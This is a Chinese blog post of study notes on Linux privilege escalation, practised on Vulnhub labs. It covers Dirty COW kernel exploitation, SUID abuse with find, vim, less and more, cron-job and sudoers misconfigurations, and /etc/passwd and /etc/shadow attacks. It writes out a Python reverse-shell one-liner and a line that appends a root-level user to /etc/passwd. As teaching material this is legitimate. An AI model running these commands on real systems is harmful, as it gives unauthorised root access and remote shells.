freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Linux提权学习总结
2022-04-02 16:19:12
所属地 河南省

前言

之前,打靶场的时候一遇到提权就没思路了,为了避免以后比赛遇到这种情况,我决定对linux的提权方法进行一些总结。

正题

linux提权总共分大概六大类
图片.png
linux提权中,最常用的就是内核提权。除了数据库提权,别的遇见几率都很比较小。

内核提权

一般提权,大部分都是内核提权,但是通杀的内核提权漏洞几乎没有,所以我们在提权之前,要首先对目标服务器的内核进行一波信息收集。
查看发行版本

cat /etc/issue
cat /etc/*-release

查看内核版本,

uname -a

在正式介绍内核提权之前,我先介绍两个工具。

Linux-exploit-suggester

Linux-exploit-suggester
收集内核的信息,并且根据信息,筛选一些内核提权的漏洞。

Searchsploit

根据内核版本或者漏洞名称提供对应内核漏洞的EXP的本地地址,方便使用。
使用方法:
图片.png

内核提权实战

这里,我使用的是Vulnhub靶场Lampiao里面有一个内核提权的漏洞,详细的渗透过程就不写了,只写一下内核提权相关。
图片.png版本为4.4.0-31 2016年发行
上传Linux-exploit-suggester
upload /tmp/linux-exploit-suggester.sh /tmp/1.sh
然后赋予777权限
图片.png弹shell,执行1.sh
图片.png可以看到,脏牛提权
图片.png通过searchsploit 查找dirty 相关的EXP
图片.png复制40847.cpp文件到当前目录。
图片.png将exp上传到靶机,并且编译运行
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 1 1.cpp -lutil
图片.png然后运行./1即可拿到rootpassword
图片.png可以看到提权成功。别的内核提权和这次提权也大差不差,都是先对内核进行一波信息收集,然后根据内核版本,寻找对应的提权的方法。

SUID提权

SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行 ,简单的说就是,当我们以一个普通用户去运行一个root用户所有的SUID文件,那么运行该文件我们就可以获取到root权限 。

为文件附上这样的权限可以使用命令:chmod u+s 或者chmod 4755
可以使用如下poc 寻找符合要求的文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

图片.png这些二级制文件都是有SUID权限的,我们运行它,我们也会暂时拥有root权限。
下面我们就用find做实。
首先对find命令赋权,
图片.png查看权限,
图片.png提权成功,
图片.png弹shell
find 1.txt -exec python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" \;

当然,vim、bash、less、more 均可以进行如上提权成功的案例,但是弹shell的命令可能不同。而且都要有SUID的权限。
vim拥有SUID的权限的时候,我们甚至能修改/etc/shadow等重要文件。
图片.png
:set shell=/bin/sh
图片.png
:shell
图片.png
提权成功。
图片.pngbash赋权之后,bash也能提权,
图片.png
less/more提权,
!/bin/sh
图片.png提权成功,
图片.png
more同理 。之后我就不一一列举了,这种虽然方便,但是一切建立在SUID的权限之上。
其余的一些命令的提权可以参考这篇文章

计划任务提权

大概思路就是,对于可能存在的权限配置不当的有root权限的计划任务,使我们普通用户也拥有修改权限,我们修改其中的内容,为bash、less、more等赋予SUID权限,与SUID提权结合,使之提权成功。

系统内可能会有一些定时执行的任务,一般这些任务由crontab来管理,具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出。

利用如下的命令可以列出一些计划任务。

ls -l /etc/cron*

cat /etc/crontab 

图片.png图片.png这里我们如果遇到有权限配置为777-rwxrwxrwx的计划任务,我们就可以对文件内容进行修改,进行提权。
cp /bin/bash /tmp/bash; chmod u+s /tmp/bash;
bash赋予SUID权限。
当然,如果对vim、less、find等命令赋权均可
cp /bin/vim /tmp/vim ; chmod u+s /tmp/vim; //为vim赋值
接下来等到任务执行即可。

配置错误导致提权

这里分享两个工具,可以帮助查找一些错误配置。
unix-privesc-checkhttp://pentestmonkey.net/tools/audit/unix-privesc-check
linuxprivcheckerhttps://www.securitysift.com/download/linuxprivchecker.py
图片.png这两个工具不仅列出了配置问题,而且还会列出所有可写文件。
当然想手撸错误配置的话参考https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
这里还是说个配置错误导致的提权吧。

sudo提权

一般情况下,如果普通用户想要提权到root权限使用sudo命令的话,都需要输入密码,但是,如果管理员为了方便登录和管理,对配置文件/etc/sudoers进行更改,使其sudo免密登录。
添加:liang ALL=(ALL:ALL) NOPASSWD:ALL //liang为我们指定的用户
图片.png图片.png可以看到,因为配置不当,liang这个用户使用sudo命令提权到root时,已经不需要密码了。

明文root密码提权

一般来说 ,linux的用户和密码 都和/etc/passwd和/etc/shadow这两个文件有关。/etc/passwd中存储的是用户,其中X代表密码hash被放在/etc/shadow文件中,并且/etc/passwd全用户可读。/etc/shadow中存储的就是密码的hash,只有root用户可读。

对/etc/passwd文件有写权限。

使用工具OpenSSL加密密码。
openssl passwd -1 -salt laodou laodou
图片.png

echo 'laodou:$1$laodou$zDGbTCLR5TMxtmjARaxhQ1
:0:0::/root:/bin/bash'  >>/etc/passwd

但是这个提权方法之前在vulunhub靶场 AI WEB1并没有使用成功。哪里做的错误的地方,还请师傅们斧正。

对/etc/shadow文件有读权限。

当我们对/etc/shadow有读权限的时候,我们可以利用hash、john等工具对密码进行爆破。对与join工具的使用,这里就不详解了,可以参考join工具使用

第三方服务提权

第三方服务提权主要就数据库的提权。

数据库提权

数据库提权又包括

1.UDF提权

2.MOF提权

3.启动项提权

4.CVE-2016-6663、CVE-2016-6664组合提权

5.反弹端口提权 

因为本文主要写的是对linux提权的小结,这里便不再详述数据库提权了。

总结

对Linux提权总归是有个大概的了解了,并非一篇总结就等于我学会了Linux提权,积累才是最重要的。冲冲冲!!!

参考

https://www.cnblogs.com/sfsec/p/15163907.html
https://xz.aliyun.com/t/8139
https://blog.csdn.net/devil8123665/article/details/107485260
https://blog.csdn.net/weixin_47767605/article/details/106183044
https://blog.csdn.net/zhangge3663/article/details/113879113

# 渗透测试 # 网络安全 # web安全 # 网络安全技术
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录